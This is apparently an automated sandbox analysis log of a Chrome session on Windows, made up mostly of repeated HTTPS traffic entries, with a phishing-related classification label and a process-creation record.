    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50258 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
    Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
    Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
    Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50216
    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
    Source: unknownNetwork traffic detected: HTTP traffic on port 50254 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50219
    Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
    Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50211
    Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50214
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50213
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50226
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50229
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50228
    Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
    Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
    Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50225
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
    Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50238
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50237
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50239
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
    Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50232
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50231
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50236
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50235
    Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50249
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
    Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50248
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
    Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50241
    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50240
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50243
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50242
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50245
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
    Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50247
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50250
    Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50204
    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
    Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
    Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
    Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50251 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
    Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
    Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
    Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
    Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50196
    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
    Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50198
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
    Source: unknownNetwork traffic detected: HTTP traffic on port 50241 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
    Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
    Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
    Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
    Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
    Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
    Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
    Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
    Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
    Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
    Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
    Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49779 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.16:50009 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.209.187:443 -> 192.168.2.16:50021 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:50040 version: TLS 1.2
    Source: classification engineClassification label: mal52.phis.win@27/235@89/297
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
